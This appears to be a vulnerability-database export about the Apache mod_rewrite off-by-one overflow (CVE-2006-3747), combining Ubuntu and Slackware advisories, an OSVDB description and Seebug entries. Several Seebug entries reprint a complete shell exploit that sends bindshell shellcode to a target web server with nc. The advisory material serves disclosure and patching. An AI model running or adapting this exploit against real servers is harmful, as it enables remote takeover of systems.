Size/MD5: 215272 bc9bdc143359a2cd379e6d92b603695f\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.1_powerpc.deb\r\n Size/MD5: 219192 1fb310e239bdc4eb50c402481424c109\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.1_powerpc.deb\r\n Size/MD5: 170938 21604d1e84accd9d391a8ffa9270814b\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.1_powerpc.deb\r\n Size/MD5: 171708 74cedc7b0b07a705ebf86cdfca83be39\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.1_powerpc.deb\r\n Size/MD5: 103484 e1c6572ce8ca8b87e3d02d6e10811d0b\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.1_powerpc.deb\r\n Size/MD5: 35756 63150684c36485680f904bff7f0f33dd\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.34-2ubuntu0.1_powerpc.deb\r\n Size/MD5: 404376 f0b7221c76c25c23000c89b98748182b\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/libapache-mod-perl_1.29.0.4-2ubuntu0.1_powerpc.deb\r\n Size/MD5: 492342 a39edb0bf286a1ad00fbdad7b0b34a87\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.1_powerpc.deb\r\n Size/MD5: 280794 9b3f787e252992a4cfc8701834c8e264\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.1_powerpc.deb\r\n Size/MD5: 140906 e46af1711b11881f6fced5dcbdc4ded4\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-common_1.3.34-2ubuntu0.1_sparc.deb\r\n Size/MD5: 848164 bf16bc264a7cb4fb4b00589ce876fbf3\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dbg_1.3.34-2ubuntu0.1_sparc.deb\r\n Size/MD5: 8789014 7491e60fc947bea209b716d6809fb471\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-perl_1.3.34-2ubuntu0.1_sparc.deb\r\n Size/MD5: 510756 a56f486883acab1b8307dee15c33269a\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-ssl_1.3.34-2ubuntu0.1_sparc.deb\r\n Size/MD5: 495232 f062b6639709aebe320e85074c412de4\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.1_sparc.deb\r\n Size/MD5: 803312 9630ce33d497294b2e18354c372c88d0\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.1_sparc.deb\r\n Size/MD5: 209738 4a12d7e0ade0e0fbb3467ebaafa801fb\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.1_sparc.deb\r\n Size/MD5: 205418 730a1dad472f64e718abb6c535236818\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.1_sparc.deb\r\n Size/MD5: 209156 c522212e4be0ee05ce0a4805fce399c7\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.1_sparc.deb\r\n Size/MD5: 170934 4c37d5218adb9a78fd4ac2adc833f6d6\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.1_sparc.deb\r\n Size/MD5: 171720 804531314e706f5552bf60b491c3126b\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.1_sparc.deb\r\n Size/MD5: 92830 9ca8aec605259f6690d368817e0441eb\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.1_sparc.deb\r\n Size/MD5: 35760 bc262d6c6a7b328586ec5eeb53e6fd20\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.34-2ubuntu0.1_sparc.deb\r\n Size/MD5: 391024 1b74b327a8fc46a0c63e7555e754985c\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/libapache-mod-perl_1.29.0.4-2ubuntu0.1_sparc.deb\r\n Size/MD5: 490954 4f3aab50fb9e1dca25e32be5fd441a3a\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.1_sparc.deb\r\n Size/MD5: 267372 ffd9172cd880a823248d5e31f0dc38f0\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.1_sparc.deb\r\n Size/MD5: 129612 b6389c465ec05e8697b3ea4370014a04\r\n", "edition": 1, "modified": "2006-07-28T00:00:00", "published": "2006-07-28T00:00:00", "id": "SECURITYVULNS:DOC:13661", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13661", "title": "[Full-disclosure] [USN-328-1] Apache vulnerability", "type": "securityvulns", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:24", "bulletinFamily": "software", "cvelist": ["CVE-2006-3747"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Apache HTTP Server's 'mod_rewrite' module when using LDAP scheme handling and specific rules (see technical desc). The Apache Server fails to check input boundaries resulting in an off-by-one overflow. With a specially crafted request, an attacker can cause a denial of service or possibly execute arbitrary code resulting in a loss of integrity and/or availability.\n## Technical Description\nSome RewriteRules, specifically those where the remote user can influence the beginning of a rewritten URL and that do not include any of the following flags: Forbidden (F), Gone (G), or NoEscape (NE) could expose the vulnerability.\n\nFor example, this type of rule is vulnerable:\nRewriteRule fred/(.*) \nWhile this one is not :\nRewriteRule fred/(.*) joe/\n## Solution Description\nUpgrade to version 1.3.37, 2.0.59, 2.2.3 or higher, as it has been reported to fix this vulnerability. Alternatively, users can disable mod_rewrite engine (by setting \"RewriteEngine off\") as a workaround.\n## Short Description\nA remote overflow exists in Apache HTTP Server's 'mod_rewrite' module when using LDAP scheme handling and specific rules (see technical desc). The Apache Server fails to check input boundaries resulting in an off-by-one overflow. With a specially crafted request, an attacker can cause a denial of service or possibly execute arbitrary code resulting in a loss of integrity and/or availability.\n## References:\nVendor Specific News/Changelog Entry: http://www.apache.org/dist/httpd/Announcement2.2.html\nVendor Specific News/Changelog Entry: http://www.apache.org/dist/httpd/Announcement1.3.html\nVendor Specific News/Changelog Entry: http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18&ID=3117\nVendor Specific News/Changelog Entry: http://www-1.ibm.com/support/docview.wss?uid=swg27007951\nVendor Specific News/Changelog Entry: http://www.apache.org/dist/httpd/Announcement2.0.html\n[Vendor Specific Advisory URL](http://www.openbsd.org/errata.html#httpd)\n[Vendor Specific Advisory URL](http://www.ubuntu.com/usn/usn-328-1)\n[Vendor Specific Advisory URL](http://www-1.ibm.com/support/docview.wss?uid=swg1PK29154)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:133)\n[Vendor Specific Advisory URL](https://issues.rpath.com/browse/RPL-538)\n[Vendor Specific Advisory URL](http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.610131)\n[Vendor Specific Advisory URL](http://www.trustix.org/errata/2006/0044/)\n[Vendor Specific Advisory URL](http://www-1.ibm.com/support/docview.wss?uid=swg24013080)\n[Vendor Specific Advisory URL](http://sunsolve.sun.com/search/document.do?assetkey=1-26-102662-1)\n[Vendor Specific Advisory URL](http://itrc.hp.com/service/cki/docDisplay.do?docId=c00797078)\n[Vendor Specific Advisory URL](http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE)\n[Vendor Specific Advisory URL](http://www.novell.com/linux/security/advisories/2006_43_apache.html)\n[Vendor Specific Advisory URL](http://www-1.ibm.com/support/docview.wss?uid=swg1PK29156)\n[Vendor Specific Advisory URL](http://sunsolve.sun.com/search/document.do?assetkey=1-26-102663-1)\n[Secunia Advisory ID:21273](https://secuniaresearch.flexerasoftware.com/advisories/21273/)\n[Secunia Advisory ID:21478](https://secuniaresearch.flexerasoftware.com/advisories/21478/)\n[Secunia Advisory ID:22262](https://secuniaresearch.flexerasoftware.com/advisories/22262/)\n[Secunia Advisory ID:22388](https://secuniaresearch.flexerasoftware.com/advisories/22388/)\n[Secunia Advisory ID:22523](https://secuniaresearch.flexerasoftware.com/advisories/22523/)\n[Secunia Advisory ID:21197](https://secuniaresearch.flexerasoftware.com/advisories/21197/)\n[Secunia Advisory ID:21247](https://secuniaresearch.flexerasoftware.com/advisories/21247/)\n[Secunia Advisory ID:21315](https://secuniaresearch.flexerasoftware.com/advisories/21315/)\n[Secunia Advisory ID:21284](https://secuniaresearch.flexerasoftware.com/advisories/21284/)\n[Secunia Advisory ID:21313](https://secuniaresearch.flexerasoftware.com/advisories/21313/)\n[Secunia Advisory ID:21346](https://secuniaresearch.flexerasoftware.com/advisories/21346/)\n[Secunia Advisory ID:26329](https://secuniaresearch.flexerasoftware.com/advisories/26329/)\n[Secunia Advisory ID:21241](https://secuniaresearch.flexerasoftware.com/advisories/21241/)\n[Secunia Advisory ID:21245](https://secuniaresearch.flexerasoftware.com/advisories/21245/)\n[Secunia Advisory ID:21307](https://secuniaresearch.flexerasoftware.com/advisories/21307/)\n[Secunia Advisory ID:21266](https://secuniaresearch.flexerasoftware.com/advisories/21266/)\n[Secunia Advisory ID:21509](https://secuniaresearch.flexerasoftware.com/advisories/21509/)\n[Secunia Advisory ID:22368](https://secuniaresearch.flexerasoftware.com/advisories/22368/)\n[Secunia Advisory ID:22669](https://secuniaresearch.flexerasoftware.com/advisories/22669/)\n[Secunia Advisory ID:23260](https://secuniaresearch.flexerasoftware.com/advisories/23260/)\nOther Advisory URL: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01118771\nOther Advisory URL: http://www.apache.org/dist/httpd/Announcement1.3.html\nOther Advisory URL: http://www.niscc.gov.uk/niscc/docs/al-20060728-00515.html?lang=en\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200608-01.xml\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1132\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1131\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0398.html\nMail List Post: http://attrition.org/pipermail/vim/2006-November/001125.html\nMail List Post: http://attrition.org/pipermail/vim/2006-November/001126.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-12/0089.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0674.html\nKeyword: HPSBMA02250,SSRT061275\nKeyword: HPSBUX02172,SSRT061269\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2237\n[CVE-2006-3747](https://vulners.com/cve/CVE-2006-3747)\nCERT VU: 395412\n", "modified": "2006-07-28T06:04:20", "published": "2006-07-28T06:04:20", "href": "https://vulners.com/osvdb/OSVDB:27588", "id": "OSVDB:27588", "title": "Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow", "type": "osvdb", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T22:28:10", "description": "No description provided by source.", "published": "2006-08-21T00:00:00", "title": "Apache < 1.3.37\t 2.0.59\t 2.2.3 (mod_rewrite) Remote Overflow PoC", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2006-08-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-16391", "id": "SSV:16391", "sourceData": "\n #!/bin/sh\n# Exploit for Apache mod_rewrite off-by-one.\n# Vulnerability discovered by Mark Dowd.\n# CVE-2006-3747\n# \n# by jack <jack\\x40gulcas\\x2Eorg>\n# 2006-08-20\n#\n# Thx to xuso for help me with the shellcode.\n#\n# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not\n# you must recalculate adressess.\n#\n# Shellcode is based on Taeho Oh bindshell on port 30464 and modified\n# for avoiding apache url-escape.. Take a look is quite nice ;)\n#\n# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at\n# 0x0834ae77 for any other version/system find it.\n#\n# Gulcas rulez :P\n\necho -e "mod_rewrite apache off-by-one overflow"\necho "by jack <jack\\x40gulcas\\x2eorg>\\n\\n"\n\nif [ $# -ne 1 ] ; then\n echo "Usage: $0 webserver"\n exit\nfi\n\nhost=$1\n\necho -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\\\n%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\\\n%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\\\n%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\\\n%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\\\n%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\\\n%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\\\n%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\\\n%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\\\n%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\\r\\n\\\nHost: $host\\r\\n\\r\\n" | nc $host 80\n\n# milw0rm.com [2006-08-21]\n\n ", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-16391"}, {"lastseen": "2017-11-19T22:06:14", "description": "No description provided by source.", "published": "2007-04-10T00:00:00", "type": "seebug", "title": "Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2007-04-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-6610", "id": "SSV:6610", "sourceData": "\n #!/bin/sh\r\n#\u00a0Exploit\u00a0for\u00a0Apache\u00a0mod_rewrite\u00a0off-by-one(Win32).\r\n#\r\n#\u00a0by\u00a0axis\u00a0<axis@ph4nt0m>\r\n#\u00a0http://www.ph4nt0m.org\r\n#\u00a02007-04-06\r\n#\r\n#\u00a0Tested\u00a0on\u00a0Apache\u00a02.0.58\u00a0(Win32)\r\n#\u00a0Windows2003\u00a0CN\u00a0SP1\r\n#\r\n#\u00a0Vulnerable\u00a0Apache\u00a0Versions:\r\n#\u00a0*\u00a01.3\u00a0branch:\u00a0>1.3.28\u00a0and\u00a0<1.3.37\r\n#\u00a0*\u00a02.0\u00a0branch:\u00a0>2.0.46\u00a0and\u00a0<2.0.59\r\n#\u00a0*\u00a02.2\u00a0branch:\u00a0>2.2.0\u00a0and\u00a0<2.2.3\r\n#\r\n#\r\n#\u00a0Vulnerability\u00a0discovered\u00a0by\u00a0Mark\u00a0Dowd.\r\n#\u00a0CVE-2006-3747\r\n#\u00a0\r\n#\u00a0first\u00a0POC\u00a0by\u00a0jack\u00a0<jackx40gulcasx2Eorg>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-6610", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T15:29:05", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-63874", "id": "SSV:63874", "sourceData": "\n #!/bin/sh\r\n# Exploit for Apache mod_rewrite off-by-one.\r\n# Vulnerability discovered by Mark Dowd.\r\n# CVE-2006-3747\r\n# \r\n# by jack <jack\\x40gulcas\\x2Eorg>\r\n# 2006-08-20\r\n#\r\n# Thx to xuso for help me with the shellcode.\r\n#\r\n# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not\r\n# you must recalculate adressess.\r\n#\r\n# Shellcode is based on Taeho Oh bindshell on port 30464 and modified\r\n# for avoiding apache url-escape.. Take a look is quite nice ;)\r\n#\r\n# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at\r\n# 0x0834ae77 for any other version/system find it.\r\n#\r\n# Gulcas rulez :P\r\n\r\necho -e "mod_rewrite apache off-by-one overflow"\r\necho "by jack <jack\\x40gulcas\\x2eorg>\\n\\n"\r\n\r\nif [ $# -ne 1 ] ; then\r\n echo "Usage: $0 webserver"\r\n exit\r\nfi\r\n\r\nhost=$1\r\n\r\necho -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\\\r\n%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\\\r\n%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\\\r\n%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\\\r\n%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\\\r\n%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\\\r\n%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\\\r\n%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\\\r\n%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\\\r\n%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\\r\\n\\\r\nHost: $host\\r\\n\\r\\n" | nc $host 80\r\n\r\n# milw0rm.com [2006-08-21]\r\n\n ", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-63874"}, {"lastseen": "2017-11-19T22:22:19", "description": "Apache\u662f\u4e00\u6b3e\u5f00\u653e\u6e90\u4ee3\u7801WEB\u670d\u52a1\u7a0b\u5e8f\u3002\r\n\r\nApache\u7684mod_rewrite\u6a21\u5757\u5728\u8f6c\u4e49\u7edd\u5bf9URI\u4e3b\u9898\u65f6\u5b58\u5728\u5355\u5b57\u8282\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u5728\u670d\u52a1\u5668\u4e0a\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\r\n\r\nmod_rewrite\u6a21\u5757\u7684escape_absolute_uri()\u51fd\u6570\u5206\u79bbLDAP URL\u4e2d\u7684\u4ee4\u724c\u65f6\uff0c\u4f1a\u5bfc\u81f4\u5728\u5b57\u7b26\u6307\u9488\u6570\u7ec4\u4ee5\u5916\u5199\u5165\u6307\u5411\u7528\u6237\u63a7\u5236\u6570\u636e\u7684\u6307\u9488\uff0c\u8fd9\u6837\u5c31\u53ef\u80fd\u5b8c\u5168\u63a7\u5236\u53d7\u5f71\u54cd\u7684\u4e3b\u673a\u3002\n\nApache Group Apache 2.2.x >= 2.2.0\r\nApache Group Apache 2.0.x >= 2.0.46\r\nApache Group Apache 1.3.x >= 1.3.28\n \u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u7981\u7528Apache\u7684mod_rewrite\u6a21\u5757\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nApache Group\r\n------------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=\"http://httpd.apache.org/download.cgi\" target=\"_blank\">http://httpd.apache.org/download.cgi</a>\r\n\r\nDebian\r\n------\r\nDebian\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\uff08DSA-1132-1, DSA-1131-1\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nDSA-1132-1\uff1aNew apache2 packages fix buffer overflow\r\n\u94fe\u63a5\uff1a<a href=\"http://www.debian.org/security/2005/dsa-1132\" target=\"_blank\">http://www.debian.org/security/2005/dsa-1132</a>\r\n\r\nDSA-1131-1\uff1aNew apache package fix buffer overflow\r\n\u94fe\u63a5\uff1a<a href=\"http://www.debian.org/security/2005/dsa-1131\" target=\"_blank\">http://www.debian.org/security/2005/dsa-1131</a>\r\n\r\nGentoo\r\n------\r\nGentoo\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08GLSA-200608-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nGLSA-200608-01\uff1aApache: Off-by-one flaw in mod_rewrite\r\n\u94fe\u63a5\uff1a<a href=\"http://security.gentoo.org/glsa/glsa-200608-01.xml\" target=\"_blank\">http://security.gentoo.org/glsa/glsa-200608-01.xml</a>\r\n\r\n\u6240\u6709Apache\u7528\u6237\u90fd\u5e94\u5347\u7ea7\u5230\u6700\u65b0\u7248\u672c\uff1a\r\n\r\n # emerge --sync\r\n # emerge --ask --oneshot --verbose net-www/apache", "published": "2006-11-05T00:00:00", "type": "seebug", "title": "Apache mod_rewrite\u6a21\u5757\u5355\u5b57\u8282\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2006-11-05T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-429", "id": "SSV:429", "sourceData": "\n #!/bin/sh\r\n# Exploit for Apache mod_rewrite off-by-one.\r\n# Vulnerability discovered by Mark Dowd.\r\n# CVE-2006-3747\r\n#\r\n# by jack <jack\\x40gulcas\\x2Eorg>\r\n# 2006-08-20\r\n#\r\n# Thx to xuso for help me\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-429", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2020-10-25T16:36:07", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3747"], "description": "New Apache packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1,\n10.2, and -current to fix a security issue with mod_rewrite.\n\nMore details about the issues may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3747\n\nIn addition, new mod_ssl packages for Apache 1.3.37 are available for\nall of these versions of Slackware. This additional package does not\nfix a security issue, but may be required on your system depending on\nyour Apache setup.\n\n\nHere are the details from the Slackware 10.2 ChangeLog:\n\npatches/packages/apache-1.3.37-i486-1_slack10.2.tgz:\n Upgraded to apache-1.3.37.\n From the announcement on httpd.apache.org:\n This version of Apache is security fix release only. An off-by-one flaw\n exists in the Rewrite module, mod_rewrite, as shipped with Apache 1.3\n since 1.3.28, 2.0 since 2.0.46, and 2.2 since 2.2.0.\n The Slackware Security Team feels that the vast majority of installations\n will not be configured in a vulnerable way but still suggests upgrading to\n the new apache and mod_ssl packages for maximum security.\n For more details, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3747\n And see Apache's announcement here:\n http://www.apache.org/dist/httpd/Announcement1.3.html\n (* Security fix *)\npatches/packages/mod_ssl-2.8.28_1.3.37-i486-1_slack10.2.tgz:\n Upgraded to mod_ssl-2.8.28-1.3.37.\n\nWhere to find the new packages:\n\nUpdated packages for Slackware 8.1:\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/apache-1.3.37-i386-1_slack8.1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/mod_ssl-2.8.28_1.3.37-i386-1_slack8.1.tgz\n\nUpdated packages for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/apache-1.3.37-i386-1_slack9.0.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/mod_ssl-2.8.28_1.3.37-i386-1_slack9.0.tgz\n\nUpdated packages for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/apache-1.3.37-i486-1_slack9.1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/mod_ssl-2.8.28_1.3.37-i486-1_slack9.1.tgz\n\nUpdated packages for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/apache-1.3.37-i486-1_slack10.0.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/mod_ssl-2.8.28_1.3.37-i486-1_slack10.0.tgz\n\nUpdated packages for Slackware 10.1:\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/apache-1.3.37-i486-1_slack10.1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/mod_ssl-2.8.28_1.3.37-i486-1_slack10.1.tgz\n\nUpdated packages for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/apache-1.3.37-i486-1_slack10.2.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/mod_ssl-2.8.28_1.3.37-i486-1_slack10.2.tgz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/apache-1.3.37-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/mod_ssl-2.8.28_1.3.37-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 8.1 packages:\n55d47a6b97a9d7a22c7a763516efcea8 apache-1.3.37-i386-1_slack8.1.tgz\n1368c7ae40208b163f3206f3e22048ff mod_ssl-2.8.28_1.3.37-i386-1_slack8.1.tgz\n\nSlackware 9.0 packages:\n99ce9375d240afd31b9106adec400815 apache-1.3.37-i386-1_slack9.0.tgz\n5a61caaf9f4165212907e6a296356c43 mod_ssl-2.8.28_1.3.37-i386-1_slack9.0.tgz\n\nSlackware 9.1 packages:\n25a4d00152a314a0725d911042e96401 apache-1.3.37-i486-1_slack9.1.tgz\n7cc5b41158adf19a069897add2700afa mod_ssl-2.8.28_1.3.37-i486-1_slack9.1.tgz\n\nSlackware 10.0 packages:\n84542fd4e9b31a5607810ccf4a37a103 apache-1.3.37-i486-1_slack10.0.tgz\ndc47b69b0609f94a68196d07c42d563f mod_ssl-2.8.28_1.3.37-i486-1_slack10.0.tgz\n\nSlackware 10.1 packages:\nd442b2fa446eb41592ad2b0b8f9bf836 apache-1.3.37-i486-1_slack10.1.tgz\nfc5dc2154b3d906a91745761a9511276 mod_ssl-2.8.28_1.3.37-i486-1_slack10.1.tgz\n\nSlackware 10.2 packages:\n289a0160cce32539318b6155e112905d apache-1.3.37-i486-1_slack10.2.tgz\nf115fb6e615f2688e182a7696b63f76e mod_ssl-2.8.28_1.3.37-i486-1_slack10.2.tgz\n\nSlackware -current packages:\n8031dea830403ed012b6cf12795dd219 apache-1.3.37-i486-1.tgz\nfb24b42306a8731b1fcce93c90f99ded mod_ssl-2.8.28_1.3.37-i486-1.tgz\n\n\nInstallation instructions:\n\nFirst, stop apache:\n\n > apachectl stop\n\nThen, upgrade the apache package:\n\n > upgradepkg apache-1.3.37-i486-1_slack10.2.tgz mod_ssl-2.8.28_1.3.37-i486-1_slack10.2.tgz\n\nFinally, restart apache:\n\n > apachectl start\n\nOr, if you use mod_ssl:\n\n > apachectl startssl", "modified": "2006-07-29T00:21:45", "published": "2006-07-29T00:21:45", "id": "SSA-2006-209-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.610131", "type": "slackware", "title": "[slackware-security] Apache httpd", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2019-06-04T23:19:39", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "description": "Added: 06/22/2007 \nCVE: [CVE-2006-3747](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3747>) \nBID: [19204](<http://www.securityfocus.com/bid/19204>) \nOSVDB: [27588](<http://www.osvdb.org/27588>) 